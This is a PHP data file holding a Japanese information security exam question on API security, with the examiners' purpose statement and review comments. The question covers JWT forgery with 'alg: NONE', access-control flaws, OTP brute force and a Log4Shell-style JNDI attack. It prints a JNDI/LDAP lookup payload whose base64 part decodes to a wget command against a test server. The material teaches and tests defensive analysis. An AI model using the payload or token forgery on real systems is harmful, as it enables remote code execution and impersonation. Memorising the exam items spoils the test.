<?php

return [
    'year' => 2024,
    'season' => 'haru',
    'section' => 1,
    'sentence' => <<<'EOF'
問1APIセキュリティに関する次の記述を読んで,設問に答えよ。
G 社は,ヘルスケアサービス新興企業である。利用者が食事,体重などを入力して,そのデータを管理したり,健康リスクの判定や食事メニューのアドバイスを受けたりできるサービス(以下,サービスYという)を計画している。
具体的には,クラウドサービス上にサービスY用のシステム(以下,Sシステムという)を構築して,G社が既に開発しているスマートフォン専用アプリケーションプログラム(以下,G社スマホアプリという)からアクセスする。
Sシステムの要件を図1に示す。

<図1 Sシステムの要件(抜粋)>
要件1: 利用者が入力したデータを蓄積する。
要件2: 蓄積したデータを機械学習で学習し,その結果を利用して健康リスクの判定や食事メニューのアドバイスを利用者に提供する。
要件3: 利用者のステータス(以下,利用者ステータスという)として,“有償利用者”と“無償利用者”を定義する。有償利用者の場合,全ての機能を利用できる。無償利用者の場合,機能の利用に一部制限がある。
要件4: 可能な限り,既存のサービスやライブラリを使って構築する。
</図1>

G社は,Sシステムの構築をITベンダーF社に委託した。F社との協議の結果,クラウドサービスプロバイダE社のクラウドサービス上にSシステムを構築する方針にした。
[APIの設計]
Sシステムには,将来的には他社が提供するスマートフォン専用アプリケーションプログラムからもアクセスすることを想定し,RESTful API方式のAPI(以下,SシステムのAPIをS-APIという)を用意する。
RESTful APIの設計原則の一つにセッション管理を行わないという性質がある。この性質を[空欄 a]という。
E社が提供するクラウドサービスのサービス一覧を表1に,サービスYのシステム構成を図2に,S-API呼出し時の動作概要を図3に,S-APIの仕様を表2に,Sシステムの仕様を図4に,それぞれ示す。

<表1 E社が提供するクラウドサービスのサービス一覧 (抜粋)>
|サービス名|サービス概要|
|---|---|
|サービスK|APIゲートウェイサービスである。当該サービスは,APIへのリクエストを受信し,その内容に基づき,サービスLを呼び出す。|
|サービスL|イベント駆動型のコンピューティングサービスである。サービスK からの呼出しがあったとき,又は指定された日時に,事前に定義された処理を実行する。また,外部サービスと連携する。
|サービスM|マネージド型のデータベースサービスである。|
|サービスN|マネージド型のWAF サービスである。サービスKが受信したAPIへのリクエストを検査して許可検知遮断を行う。|

注記) Sシステムの構築時点では,サービスNを導入しない計画である。
</表1>

// TODO:作図
<図2 サービスYのシステム構成>
@startuml
usecase インターネット
card 外部サービス

frame スマートフォン{
card G社スマホアプリ
card メールアプリ
}

frame E社クラウドサービス{
card Sシステム {
card サービスK
card サービスL
card サービスM
}

インターネット -- 外部サービス
インターネット -- スマートフォン
インターネット -- Sシステム
@enduml
注記) サービスK及びサービスLからインターネットへの通信は許可されている。
</図2>

<図3 S-API呼出し時の動作概要 (抜粋)>
G社スマホアプリからS-APIが呼び出された場合の動作は次のとおりである。
・S-APIが呼び出されると,S-APIへのリクエストは,サービスKが一元的に受ける。サービスKは,そのリクエスト内容に基づき,サービスを呼び出す。サービスLは,事前に定義された処理を実行してレスポンスをサービスK に返し,サービスK は,G社スマホアプリにレスポンスを返す。
・サービスLでは,データベースのデータの読取り又は書込みが必要な場合は,事前に定義された処理からサービスMを呼び出す。
</図3>

<表2 S-APIの仕様(抜粋)>
|API名|概要|メソッド|パラメータ|
|---|---|---|---|
|認証API|・利用者IDとパスワードを検証する。・利用者IDとパスワードが事前に登録されたものと一致した場合,毎回ランダムに生成される数字4桁の文字列(以下,文字列Xという)を,事前に登録されたメールアドレスに送信する。・一致しなかった場合,“認証失敗”となる。|POST|mID(利用者ID), pass (パスワード)|
|認証API|・利用者のG社スマホアプリから受信した利用POST者IDと数字4桁の文字列を検証する。・G社スマホアプリから受信した文字列が文字列X と一致した場合,“認証成功”と判定し,JSON Web Token (以下,JWTという)を発行してJWTを含むレスポンスを返す。・文字列Xを生成してから10分以内に“認証成功”とならなかった場合,“認証失敗”となる。|POST|mID(利用者ID), otp (G社スマホアプリから受信した文字列)|
|利用者API|・利用者情報を取得する。・F社が既に開発済みの利用者管理共通ライブラリ(以下,共通モジュールPという)を利用する。共通モジュールP,及び共通モジュールP を呼び出す処理 (以下,P 呼出し処理という)は,サービスLに定義されており,利用者ステータスの管理にも利用される。共通モジュールP は,サービスM を呼び出して,次の処理を行う。- GETメソッドが使われた場合,パラメータmidで指定された利用者IDにひも付く利用者情報を含むレスポンスを返す。- PUTメソッドが使われた場合,パラメータmidで指定された利用者IDにひも付く利用者情報を更新する。|GET|mID(利用者ID)|
|利用者API|上記同上|PUT|mID(利用者ID), name (名前), age (年齢)|

注記) Sシステムは,表中のパラメータのほか,HTTP リクエストのヘッダに含まれる情報を用いて処理を行う。
</表2>

<図4 Sシステムの仕様 (抜粋)>
[JWTを利用したアクセス]
・JWTは,“ヘッダ","ペイロード","署名”の3種類の要素から構成されており,各要素はbase64urlでエンコードされ,“. (ドット)" で結合されている。
    ヘッダ: 署名の作成の際に使用するアルゴリズムが指定される。
    ペイロード : 利用者ID,有効期限などが含まれる。
    署名 : ヘッダに指定されたアルゴリズムとシステムが生成したシークレットを使用し,ヘッダとペイロードに対する署名が作成される。
・Sシステムでは,JWTの管理に,F社が開発したJWT管理ライブラリ(以下,ライブラリという)を利用する。
・Sシステムから発行されたJWTは,G社スマホアプリに保存される。G 社スマホアプリは,HTTPリクエスト内のAuthorizationヘッダにBearerスキームとJWTを設定し,Sシステムに送信する。Sシステムは,受信したJWTをライブラリQに渡す。ライブラリQは,JWT内のヘッダに指定されたアルゴリズムに基づいてJWTを検証する。JWT内の署名を検証した後,ペイロードに含まれた利用者IDを確認して利用者を識別し,必要な情報を含めてレスポンスを返す。
・JWTを利用したアクセスは,ペイロードに含まれた有効期限まで許可される。

[有償利用者に対する課金方法]
・課金には外部の課金サービスを利用する。

[機械学習による学習と判定・アドバイス
・健康リスクの判定や食事メニューのアドバイスを行うため,外部の機械学習サービスを学習と分析に利用する。
・機械学習による学習は,日次バッチ処理で実現する。サービスLに定義された処理を午前1時に起動して,サービスMからデータを取り出し,外部の機械学習サービスにデータを入力する。
・G社スマホアプリからS-APIの一つである健康リスク判定API,食事推奨APIが呼び出された場合,サービスLに定義された処理が外部の機械学習サービスを呼び出して,判定・アドバイスを取得する。
</図4>

[脆弱性診断の結果]
Sシステムの構築が進み全ての機能を動作確認できたので,G社でSシステムのセキュリティを担当するRさんが,セキュリティベンダーであるU社に脆弱性診断(以下,診断という)を依頼した。U社による診断レポートを表3に示す。

<表3 U社による診断レポート(抜粋)>
|項番|名称|対象API|脆弱性|
|---|---|---|---|
|1|JWT改ざん全体によるなりすまし|全体|JWTに指定された利用者IDを利用してデータが取得,更新されるので,ヘッダとペイロードを改ざんしたJWTを送信すると,他の利用者へのなりすましが可能である。|
|2|アクセスコントロールの不備A|利用者API|パラメータmidに他の利用者IDを指定すると,他の利用者IDにひも付く利用者情報を取得,改変できてしまう。|
|3|アクセスコントロールの不備B|利用者API|利用者APIで利用者情報を更新する場合,"paid"という値を設定したパラメータ“status”を追加して送信すると,利用者ステータスを無償利用者から有償利用者に改変できてしまう。|
|4|2要素認証の突破|認証API|総当たり攻撃によって,文字列X を使った認証メカニズムを突破できる。1秒間に10回試行する総当たり攻撃を行った場合,文字列Xの検証において,平均的な認証成功までの時間は[空欄 b]秒になり,突破される可能性が高い。
</表3>

表3の項番1について,U社のセキュリティコンサルタントで情報処理安全確保支援士(登録セキスペ)のZ氏は,次のように説明した。
・認証APIで,利用者ID"user01"での認証が成功した後,診断中に発行されたJWTのデコード結果は,表4のとおりであった。

<表4 JWTのデコード結果 (抜粋)>
|ヘッダ|ペイロード|
|---|---|
|{
    "alg": "RS256",
    (省略)
}|
{
    "user": "user01",
    "iat”: 1713059329,
    "exp": 1713664129,
    (省略)
}|
</表4>

ここで,表4中の"RS256"の代わりに“NONE"を指定し,"user01”を他の利用者IDに改ざんしたJWTを送信したところ,改ざんしたJWTの検証が成功し,他の利用者へのなりすましができた。
項番2~4についても説明を受けた後,G社は,表3の脆弱性を分析し,対策について,F社,U社を交えて検討した。Rさんが取りまとめた脆弱性の分析と対策案を表5に示す。

<表5 脆弱性の分析と対策案>
|表3の項番|分析|対策案|
|---|---|---|
|1|(省略)|<下線①>ライブラリQを修正する。</下線①>|
|2|(省略)|<下線②>P呼び出し処理に処理を追加する</下線②>|
|3|利用者APIの仕様には,パラメータ"status"の指定について定義されていない。一方,実装は,指定されたパラメータを検証せず全て[空欄 c]に送信していた。ここで,送信内容を改ざんしてパラメータ“status"を追加してリクエストを送信すると,[空欄 c]は利用者ステータスを変更できる|プログラムの修正で対応する。|
|4|(省略)|次の対策を実施する。- [空欄 d]を実装する。そのしきい値は10 とする。- 突破される可能性を十分に低減するために,文字列Xを数字6桁に変更する。|
</表5>

全ての対応が完了した後,試用モニターを対象に,サービスYの提供を開始した。
[セキュリティの強化]
G社は,試用モニターへのサービスYの提供期間中に,インシデント対応に必要なログの取得方法を検討することになり,F社と協議した。
F社によれば,ログ取得モジュールを実装するには時間が掛かるが,ログ取得モジュールを実装しなくても,サービスNを導入することによって,通信ログを取得できるという。サービスNにおけるWAFルールの記述形式を図5に示す。

<図5 サービスNにおけるWAFルールの記述形式>
・ルールは,[検証対象],[パターン]及び[動作]の三つを1行に記述する。
・[検証対象]には,次のいずれかを指定する。
GET: GETメソッドのパラメータの値を検証対象とする。
POST: POSTメソッドのパラメータの値を検証対象とする。
PUT: PUTメソッドのパラメータの値を検証対象とする。
ANY: 全てのメソッドのパラメータの値を検証対象とする。
Header: 全てのヘッダの値を検証対象とする。
COOKIE: cookieの値を検証対象とする。
Multipart: Multipart/form-dataのフィールドの値を検証対象とする。
・[パターン]には,次の要素で構成される正規表現を指定する。
^ : 文字列の先頭とマッチする。
¥W : 任意の非英数字とマッチする。
x|y : x又はyとマッチする。
(x|y)z : xz又はyzとマッチする。
[xyz] : x,y又はzのいずれかにマッチする。
. : 任意の文字とマッチする。
¥. : “.”とマッチする。
* : 直前の要素の0回以上の繰返しにマッチする。
・[動作]には,次のいずれかを指定する。
許可: 通信を通過させ,ログに記録しない。
検知: 通信を通過させ,ログに記録し,管理者にアラートを送信する。
遮断: 通信を遮断し,ログに記録し,管理者にアラートを送信する。
</図5>

Rさんは,サービスNのSシステムへの導入を責任者に提案し,承認を得た。サービスNの導入完了後,サービスYの提供を開始した。

[新たな脆弱性への対応]
数週間後,ライブラリHというオープンソースのライブラリに脆弱性Vという脆弱性があることが公表された。Rさんは,脆弱性Vについての関連情報を図6のように取りまとめた。

<図6 脆弱性Vについての関連情報(抜粋)>
・ライブラリHは,非常に多くのシステムで利用されており,既に脆弱性Vが攻撃に悪用されている事例が報告されている。
・脆弱性Vが存在するサーバ(以下,攻撃対象サーバという)への攻撃の流れを次に示す。
(1) 攻撃者は,事前に攻撃用LDAPサーバと攻撃用HTTPサーバを準備する。
(2) 攻撃者は,実行したいコマンド(以下,コマンドCという)をbase64でエンコードした文字列を含む,攻撃用LDAP サーバに送信するLDAPリクエスト(以下,LDAPリクエストWという)を作成する。その後,LDAPリクエストWを含み,脆弱性Vを悪用するJNDI Lookup (Java Naming and Directory Interface Lookup)を行う攻撃コードを準備する。
(3) 準備した攻撃コードをHTTPリクエストのx-api-versionヘッダの値として指定したHTTPリクエストを攻撃対象サーバに送信する。
(4) 攻撃対象サーバは,HTTPリクエストを受信すると,攻撃コードを実行する。攻撃コードのJNDI Lookupを実行し,LDAPリクエストWを攻撃用LDAPサーバに送信する。
(5) 攻撃用LDAPサーバは,LDAPリクエストWから,コマンドCをbase64でエンコードした文字列を取り出し,デコードしてコマンドCを取り出す。コマンドCを実行させるJavaクラスファイル(以下,Jファイルという)を自動生成し,攻撃用HTTPサーバに配置する。攻撃用HTTPサーバは,Jファイルが配置された攻撃用HTTPサーバのURL(以下,URL-Jという)を攻撃用LDAPサーバに伝える。
(6) 攻撃用LDAPサーバは,URL-JをLDAPレスポンスに記載して攻撃対象サーバに返す。
(7) 攻撃対象サーバは,受信したLDAP レスポンスに記載されたURL-Jにアクセスし,Jファイルをダウンロードして,コマンドCを実行する。
・脆弱性VのCVSS v3.1に基づいた基本値は9.8と高く,早急な対応が推奨されている。しかし,現時点において,ライブラリの公式Webサイトでは,脆弱性V を修正したバージョンや暫定対策は提供されていない。
・G社はSシステムでライブラリを利用しているかをF社に問い合わせているが,Sシステムの構成を詳細に分析しなければならず,回答まで時間が掛かるとのことである。
・E社は,脆弱性V を悪用した攻撃を検知するために,サービスNにおけるWAFルールを現在開発中であるが,悪用パターンが多岐にわたることから,網羅性のあるWAFルールの提供には最大で72時間掛かると発表している。
</図6>

Rさんは,脆弱性Vへの対応方針をZ氏に相談した。Z氏は,F社の回答を待ってからの対応では遅いので,システムに影響を与えない検証コードをSシステムに対して実行し,外部から脆弱性Vを悪用できるか検証するよう提案した。Rさんは,Z氏の協力の下,図7に示す手順で検証を実施した。

<図7 Rさんが実施した検証手順>
(1) 攻撃用LDAPサーバと攻撃用HTTPサーバを兼ねたサーバ(以下,テストサーバという)を構築する。
(2) 図8に示す検証コードを作成する。
(3) <下線③>図8で指定したコマンドが実行されたことを確認する仕組み</下線③>をテストサーバに実装する。
(4) 検証コードをHTTPリクエスト中に指定してSシステムに送信する。
</図7>

<図8 作成した検証コード>
${jndi:ldap://a2.b2.c2.d2:1389/Command/Base64/d2dldCBodHRwOi8vYTIuYjIuYzIuZDIvaW5kZXguaHRtbA==}
注記1) a2b2c2d2は,Rさんがテストサーバに割り当てたIPアドレスである。
注記2) d2dldCBodHRw0i8vYTIuYjIuYzIuZDIvaW5kZXguaHRtbA==のデコード結果は, wget http://a2.b2.c2.d2/index.html である。これは,コマンドCに相当する。
</図8>

検証の結果,外部から脆弱性Vを悪用できることが確認できた。この結果を踏まえて,Rさんは,脆弱性Vを悪用する攻撃に備え,E社からWAFルールが提供されるまでの間,現在判明している悪用パターンに対応可能な暫定的なWAFルールで攻撃を遮断することにした。Rさんが考えたWAFルールの案を表6に示す。

<表6 WAFルールの案>
|ルール|検証対象|パターン|動作|
|---|---|---|---|
|1|[空欄 e]|¥Wjndi¥W|遮断|
|2|[空欄 f]|¥Wldap¥W|遮断|
</表6>

Rさんは,例えば"jnDI”のように大文字小文字を入れ替える手口によって,ルール1と2それぞれで,案のパターンを回避する方法があることに気付いた。<下線④>このような手口にも対応できるように案を変更した。</下線④> その後,変更後の案の確認をZ氏に依頼した。
Z氏は,<下線⑤>本番運用開始後の一定期間においては,WAF ルールの動作には“検知”を設定して,サービスY が今までどおり利用できるかを確認する</下線⑤>ことを助言した。Rさんは,Z氏の助言を踏まえて,WAFルールを設定した。
後日,Sシステムでは,ライブラリHを利用しているとの回答がF社からあった。また,E社からサービスNにおけるWAFルールが提供された。その後,脆弱性Vを修正したバージョンがライブラリHの公式Webサイトで配布され,Sシステム内のライブラリHのバージョンを最新にすることで,脆弱性Vへの対応が完了した。
EOF,
    'purpose' => "多くのシステムにおいて,スマートフォンのアプリケーションプログラムを利用したAPI連携が行われる中,APIの脆弱性を作り込むケースが増えている。本問では,APIセキュリティを題材として,指摘された脆弱性に対して対策を立案する能力を問う。",
    'review_comment' => <<<EOF
APIセキュリティを題材に,セキュリティ設計及び脆弱性対応について出題した。全体として正答率は平均的であった。
設問 2(2)は,正答率がやや低かった。JSON Web Token（JWT）改ざんにおける検証方法を問うたが,既に実装されている対策を解答するなど,脆弱性を正しく理解していないと思われる解答が散見された。図4に示す仕様と表3に示す脆弱性を正しく理解してほしい。
設問 3(1)は，正答率がやや低かった。脆弱性の存在を判断するための仕組みについて問うたが,図6に示す攻撃の流れに合っていない解答が散見された。脆弱性対策では,脆弱性を悪用する攻撃の流れの理解が重要であることから,正確に理解してほしい。
設問 3(4)の利点については,正答率が高かった。WAFの利点と課題は正確に理解していると思われる。セキュリティ施策は導入前にトレードオフを検討してほしい。
EOF,
];
